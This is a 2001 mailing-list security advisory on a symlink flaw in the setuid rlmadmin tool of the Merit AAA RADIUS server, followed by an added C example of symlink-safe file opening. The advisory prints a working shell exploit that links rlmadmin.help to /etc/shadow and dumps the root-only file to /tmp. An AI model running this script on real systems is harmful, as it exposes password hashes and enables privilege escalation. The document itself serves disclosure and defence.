-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
[Ministry-Of-Peace] - Security Advisory #01 - 07th Sept 2001
rlmadmin v3.8M view file symlink vulnerability
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

Overview:
---------

rlmadmin is a user management utility for RADIUS which comes with the Merit
AAA Server package (http://www.merit.edu/michnet/dial-in/aaa/). Using this
program and a simple symlink, you can view any file on the system as root.

Description:
------------

Using the -d option of rlmadmin allows you to specify the directory in which
it will look for its configuration files. The files that it looks for in this
directory during startup are:

  dictionary    - dictionary translations for parsing requests and generating
                  responses.
  rlmadmin.help - the help file that is displayed on startup.
  vendors       - vendor specific information.

The problem occurs when rlmadmin reads from the "rlmadmin.help" file. If this
file is symlinked to another file (such as /etc/shadow), the program blindly
follows the link, causing the contents of the file to be displayed when the
program starts up.

Versions Affected:
------------------

rlmadmin v3.8M (and earlier?)
rlmadmin v5.01 Commercial (available from www.interlinknetworks.com - this
version isn't setuid root by default, but is still affected if set by the
admin)

Exploit Code:
-------------

#!/bin/sh
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
# rlmadmin view file symlink vulnerability  #
# (c)oded 2001 Digital Shadow               #
# www.ministryofpeace.co.uk                 #
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #

bloc=/usr/private/etc        # executable file location
cloc=/usr/private/etc/raddb  # config file location
file=/etc/shadow             # file to read

echo == rlmadmin exploit - visit \
www.ministryofpeace.co.uk for more!
echo = Initialising...
mkdir /tmp/peace; cd /tmp/peace
cp $cloc/dictionary $cloc/vendors .
ln -s $file rlmadmin.help
echo = Exploiting...
echo quit | $bloc/rlmadmin -d /tmp/peace > peace.log
mv peace.log /tmp; rm dictionary rlmadmin.help vendors
echo = Done!
echo == Now look in /tmp/peace.log!

Credits:
--------

Vulnerability discovered by Digital Shadow.

-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
advisories[at]ministryofpeace.co.uk -- www.ministryofpeace.co.uk
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

Sent through GMX FreeMail - http://www.gmx.net
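Added example, not code from the advisory or from Merit's rlmadmin, showing how a setuid program should open a file from a user-supplied -d directory so that the symlink case in the Description section is refused: drop to the real uid for the open, pass O_NOFOLLOW, and check the opened object is a regular file. The function names, the temp-directory fixtures and the rlmadmin.help/rlmadmin.link file names are assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open "<dir>/<name>" read-only as a setuid program should from a user-supplied
 * directory: drop to the real uid for the open so the kernel checks permissions,
 * refuse symlinks (O_NOFOLLOW) and non-regular files.  Returns fd or -1. */
int open_config_safely(const char *dir, const char *name)
{
    char path[PATH_MAX]; struct stat st;
    uid_t saved = geteuid(); int fd;
    if (snprintf(path, sizeof path, "%s/%s", dir, name) >= (int)sizeof path)
        return -1;
    if (seteuid(getuid()) < 0)              /* a no-op when not setuid */
        return -1;
    fd = open(path, O_RDONLY | O_NOFOLLOW); /* ELOOP if `name` is a symlink */
    /* Check the object actually opened, not the path, which may be swapped. */
    if (fd >= 0 && (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode))) {
        close(fd); fd = -1;
    }
    if (seteuid(saved) < 0 && fd >= 0) {    /* could not regain privilege */
        close(fd); fd = -1;
    }
    return fd;
}

/* Self-check on constructed fixtures: a regular rlmadmin.help plus a symlink to
 * it in a fresh temp dir.  Returns 1 if file opens and symlink is refused. */
int selftest(void)
{
    char dir[] = "/tmp/nofollowXXXXXX", reg[PATH_MAX], lnk[PATH_MAX];
    int ok = 0, fd;
    if (!mkdtemp(dir))
        return 0;
    snprintf(reg, sizeof reg, "%s/rlmadmin.help", dir);
    snprintf(lnk, sizeof lnk, "%s/rlmadmin.link", dir);
    if ((fd = open(reg, O_WRONLY | O_CREAT, 0600)) >= 0)
        close(fd);
    if (fd >= 0 && symlink(reg, lnk) == 0 &&
        (fd = open_config_safely(dir, "rlmadmin.help")) >= 0) {
        close(fd);
        ok = open_config_safely(dir, "rlmadmin.link") == -1;
    }
    unlink(lnk); unlink(reg); rmdir(dir);
    return ok;
}
```

The same check should be applied to the dictionary and vendors files, since all three are read from the -d directory.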
This archive was generated by hypermail 2b30 : Fri Sep 07 2001 - 08:40:36 PDT